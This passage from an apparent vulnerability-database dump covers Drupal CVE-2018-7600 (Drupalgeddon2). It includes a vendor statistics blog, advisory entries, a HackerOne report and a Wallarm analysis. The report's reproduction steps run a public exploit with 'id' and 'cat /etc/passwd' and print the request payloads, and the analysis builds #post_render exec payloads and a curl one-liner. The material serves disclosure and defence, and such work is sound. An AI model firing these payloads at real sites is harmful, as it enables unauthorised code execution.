On the content management system (CMS) front, **WordPress vulnerabilities continue to grow,** and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerability numbers, **Drupal vulnerabilities had a larger effect and were used in mass attacks** that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. In the server-side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the number of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade, a workaround, or a patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. 
When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. 
In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>)_ and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n \n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress](<https://wordpress.org/plugins/>)_ official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.\n\n \n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivates more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_ (see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). 
Hence, WordPress plugins are prone to vulnerabilities.\n\n \n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins._ _This indicator solely looks at the most vulnerabilities. There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n \n\n\n \n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. 
The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n \n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>)_ popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_ (the '23-mar' bar in Figure 10 below, also known as _[Drupalgeddon2](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_) and _[CVE-2018-7602](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_ (the '25-apr' bar, also known as _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. Once exploited, they let attackers connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_ we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that was published in October. 
However, since it was not easy to exploit, the number of attacks was small.\n\n \n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions\n * Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)\n * More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. 
Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-01-09T14:00:26", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "alpinelinux": [{"lastseen": "2022-07-20T18:06:51", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or 
common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T07:29:00", "type": "alpinelinux", "title": "CVE-2018-7600", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-03-01T18:04:00", "id": "ALPINE:CVE-2018-7600", "href": "https://security.alpinelinux.org/vuln/CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-02-03T02:28:33", "bounty": 0.0, "description": "## Summary \nDue to an outdated Drupal version, remote code execution is possible on `www.\u2588\u2588\u2588\u2588\u2588` via CVE-2018-7600. \n\n## Description\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. 
\n\nVulnerable Host:\n * `www.\u2588\u2588\u2588`\n\nVisiting `https://www.\u2588\u2588\u2588/\u2588\u2588\u2588` we can see that the site runs Drupal 7.54, which was last updated on 2017-02-01.\n\nSeveral critical and highly critical vulnerabilities are known for this version (see `https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/7.x` and `https://www.drupal.org/security`). Among them is `SA-CORE-2018-002` (CVE-2018-7600), which I will demonstrate here. \n\nNote: I am reporting this here, since the page `https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588` seems to belong to the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, which belongs to the DOD. The footer further states: `\u2588\u2588\u2588\u2588\u2588\u2588. [...]`\n\n## Step-by-step Reproduction Instructions\n\n1. Download the git repository with the exploit: `git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2`\n * Install dependencies if necessary `gem install nokogiri`\n\n2. 
Run the exploit with ruby `ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login`\n\nParameters explanation: \n```\n-u, --url URL Service URL\n-v, --version VERSION Target Drupal version {7,8}\n-c, --command COMMAND Command to execute\n--form Form to attack, by default '/user/password' in Drupal 7 \n```\nThe above command outputs:\n```\nroot@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login\ndrupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup\n[i] POST: form_id=user_pass&_triggering_element_name=name\n[i] 200\n[*] Obtained build id!: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ndrupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete\ndrupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588/file/ajax/name/%23value/\u2588\u2588\u2588\u2588\u2588\u2588\n[i] POST: form_build_id=\u2588\u2588\u2588\u2588\u2588\n[i] Response code: 200\nuid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0\nroot@5b08dc005375:/Drupalgeddon2# \n```\nAs we can see, we successfully executed the `id` command, which responded with `uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0`\n\nI am also providing the output of `/etc/passwd` which I obtained with command \n```\nruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c \"cat /etc/passwd\" --form user/login\n```\nOutput: 
\n```\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n## Resources\n * https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588/7.x\n * https://www.drupal.org/security\n * https://github.com/dreadlocked/Drupalgeddon2\n * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600\n * https://www.drupal.org/sa-core-2018-002\n\n## Mitigation/Remediation Actions\nUpgrade Drupal 7 core to 7.58 or later, the release that contains the SA-CORE-2018-002 fix. Note that upgrading only closes the hole: because this is an unauthenticated remote code execution vulnerability that has been widely exploited by automated scanners and backdoor droppers, the host should also be reviewed for signs of earlier compromise (web shells, unexpected files, unknown administrative accounts) before it is considered clean.\n\n## Impact\n\nCritical - Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-21T07:51:14", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-03-24T20:24:17", "id": "H1:1063256", "href": "https://hackerone.com/reports/1063256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2019-09-26T22:28:10", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T18:25:00", "type": "f5", "title": "Drupal vulnerability CVE-2018-7600", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T18:25:00", "id": "F5:K22854260", "href": "https://support.f5.com/csp/article/K22854260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2018-04-25T08:38:51", "description": "#### New Drupal Vulnerability in Detail\n\n#### By @aLLy\n\nThe second Drupalgeddon has come! It is a new variant of a critical vulnerability in one of the most popular CMSs, which caused a big stir. This newly-discovered breach allows any unregistered user execute commands in the target system by means of a single request.\n\nThe problem is further aggravated by the fact that it puts all the most current versions of the application (7.x and 8.x branches, up to 8.5.0) under threat. The number of potentially exploitable targets is very high.\n\n### INFO\n\nThe assigned ID for the vulnerability is [CVE-2018\u20137600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>). 
It has the highest threat level (\u201chighly critical\u201d).\n\nThe developers have issued a [patch](<https://www.drupal.org/sa-core-2018-002>) as on March 28, 2018, however, as recently as April 12, there were still no links to PoC or the detailed description of the problem in the Drupal public domain. It should be noted that the patch suggested by the developers was also very laconic and gave no indication as to where the vulnerability could be discovered. The application is easily installed; moreover, Drupal has an official repository at Docker Hub, and the deployment of a container with the required CMS version only takes a couple of well documented commands. Personally, I like to use [JetBrains PhpStorm](<https://www.jetbrains.com/phpstorm/>) for debugging.\n\nGiven that the cat is out of the bag, let\u2019s take a critical look at this exploit and study it more closely.\n\n### **Deep Dive**\n\nFirst, let\u2019s take a look at the [patch](<https://github.com/drupal/drupal/commit/19b69fe8af55d8fac34a50563a238911b75f08f7>) which fixes the vulnerability.\n\n_Drupalgeddon 2 vulnerability patch commit_\n\nCool, isn\u2019t it? The developers have simply added filtering of all data submitted by users.\n\nHowever, this patch can shed some light on the nature of the vulnerability. Pay attention to the code of the checking procedure: the data is handled by the method sanitize, which invokes stripDangerousValues.\n\n**/core/lib/Drupal/Core/DrupalKernel.php**\n \n \n 545: public function preHandle(Request $request) { \n 546: _// Sanitize the request. 
\n _547: $request = RequestSanitizer::sanitize( \n 548: $request, \n 549: (array) Settings::get(RequestSanitizer::SANITIZE_WHITELIST, [])\n\n**/core/lib/Drupal/Core/Security/RequestSanitizer.php**\n \n \n 40: public static function sanitize(Request $request, $whitelist, $log_sa \n \u2026 \n 44: $request->query->replace(static::stripDangerousValues($request->q\n\nThis method, in turn, executes verification of all the submitted parameters. Zero values beginning with # and values that were not whitelisted are stripped.\n\n**/core/lib/Drupal/Core/Security/RequestSanitizer.php**\n \n \n 84: protected static function stripDangerousValues($input, array $whiteli \n 85: if (is_array($input)) { \n 86: foreach ($input as $key => $value) { \n 87: if ($key !== \u2018\u2019 && $key[0] === \u2018#\u2019 && !in_array($key, $whitelis \n 88: unset($input[$key]); \n 89: $sanitized_keys[] = $key; \n 90: } \n 91: else { \n 92: $input[$key] = static::stripDangerousValues($input[$key], $wh \n 93: } \n 94: } \n 95: } \n 96: return $input; \n 97: }\n\nWhat are those \u201cmystic\u201d parameters beginning with an pound sign? They are special placeholders for Drupal Render API. This API was introduced in the version 7.0 of the CMS and is used for rendering structured data into HTML markup.\n\nBefore the rendering phase, the data required for creating the requested page and its individual blocks is stored in the form of special arrays. This provides ample opportunities for changing the markup or the content of the page at any time during the page load or right after.\n\nRender API implements so-called Renderable Arrays (or Render Arrays). They are structured arrays, that provide data along with hints as to how this data should be rendered (presented) for the user. Keys with the hash symbol (#) are the properties used by the rendering interpreter.\n\nThere is a set number of pre-defined properties, such as form, html_tag, value, markup, etc. 
Most of them are described in the official Form API documentation.\n\nFor the purposes of studying the Drupalgeddon 2 vulnerability, we are interested in the properties which invoke call_user_func during processing.
On registering a new user, the CMS allows you to upload an avatar.
$this->render($elements, TRUE); \n 140: });\n\nNow let\u2019s use a debugger to analyze what\u2019s going on here.\n\nLet\u2019s interrupt request line NestedArray::getValue.\n\n**/core/modules/file/src/Element/ManagedFile.php**\n \n \n 176: $form_parents = explode(\u2018/\u2019, $request->query->get(\u2018element_parents \n \u2026 \n 179: $form = NestedArray::getValue($form, $form_parents); _# you\u2019re here_\n\n_Debugging of uploadAjaxCallback after uploading an avatar_\n\nThe array $form_parents received from the parameter element_parents serves as a custom path to the desired element in $form for the subsequent rendering. In my case, it looks as follows: $form[\u201cuser_picture\u201d][\u201cwidget\u201d][0]. The keys are separated by slashes, as is customary in Unix paths.\n\nYou can as easily put in your own path to the desired element \u2014 you just need to find it. Pay attention to the fields in the new account registration form, which can be filled in, namely mail and name. The parameter name. filters the user data, but the parameter name is more tolerant to such operations. Let\u2019s try to convert this parameter into an array and submit a line beginning with # as a key.\n\n_Attribute injection in the_ mail _parameter_\n \n \n $form => Array \n ( \n \u2026 \n [account] => Array \n ( \n [_#type] => container \n _[_#weight] => -10 \n _[mail] => Array \n ( \n [_#type] => email \n _[_#title] => Drupal\\Core\\StringTranslation\\TranslatableMarkup Ob \n _\u2026 \n [_#name] => mail \n _[_#value] => Array \n _( \n [_#test] => \n _) \n \u2026 \n ) \n ) \n )\n\nNow, if we take element_parents, put the value account/mail/#value in it and insert a breakpoint after the execution of NestedArray::getValue, we get a resulting renewed $form containing our parameters.\n\n_Injection of a random element and reassignment of _$form\n\nIn the next phase, we go back to the magic property #post_render and create a payload array based on this attribute. 
The function which must be executed is specified as the first element of the array.\n\nmail[_#post_render][] = \u2018exec\u2019_\n\nNext, we must specify the execution parameters. If you look at call_user_func, you\u2019ll see that they are taken from the property #children.\n\n**/core/lib/Drupal/Core/Render/Renderer.php**\n \n \n 500: if (isset($elements[\u2018#post_render\u2019])) { \n 501: foreach ($elements[\u2018#post_render\u2019] as $callable) { \n \u2026 \n 505: $elements[\u2018#children\u2019] = call_user_func($callable, $elements[\n\nLet\u2019s put them in this place.\n\nmail[_#children] = \u2018uname -a\u2019_\n\nNow, let\u2019s submit the resulting form.\n\n_Everything is set for RCE exploitation._\n\nVoila! \ud83d\ude0a\n\n_Successfully executed RCE-exploit for Drupal 8.5.0_\n\nLet\u2019s remove all the extra stuff from the query and frame it as a single-line curl command.\n\n$ curl -s -X \u2018POST\u2019 \u2014 data \u2018mail[%23post_render][]=exec&mail[%23children]=p\n\nIt\u2019s elegant and so, so easy!\n\n#### **Conclusions**\n\nWhat can I say to sum it all up?\n\nThe first red flags related to this problem were raised at the end of last year when the researcher nicknamed WhiteWinterWolf published a post in his blog about another possible scenario of Drupalgeddon exploitation. Let me remind you that the original vulnerability allowed unauthorized users to execute SQL injections.\n\nWhiteWinterWolf also provided an example of how an intruder can use this vulnerability for running remote commands after manipulating the same placeholders in an array.\n\nThe problem is highly critical for all owners of Drupal sites. Massive attacks are distinct possibility. It is very likely that cybercriminals have already added this exploit to their armory, so be proactive, write up some WAF policies and roll out relevant patches. 
By the way, if you don\u2019t want to upgrade, the developers have posted patches for all current Drupal branches in their official announcement.\n\nStill, the best way is to install the latest CMS versions: Drupal 7.58 for 7.x branch and Drupal 8.5.1 for 8.x. They have fixed the vulnerability in these updates, or that\u2019s what they told us, anyways.\n\n\n\n* * *\n\n[Drupalgeddon Two.](<https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium, where people are continuing the conversation by highlighting and responding to this story.", "cvss3": {}, "published": "2018-04-20T19:31:22", "type": "wallarmlab", "title": "Drupalgeddon Two.", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-20T19:31:22", "href": "https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18?source=rss----49b51199b3da---4", "id": "WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:52", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T07:29:00", "type": "debiancve", "title": "CVE-2018-7600", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
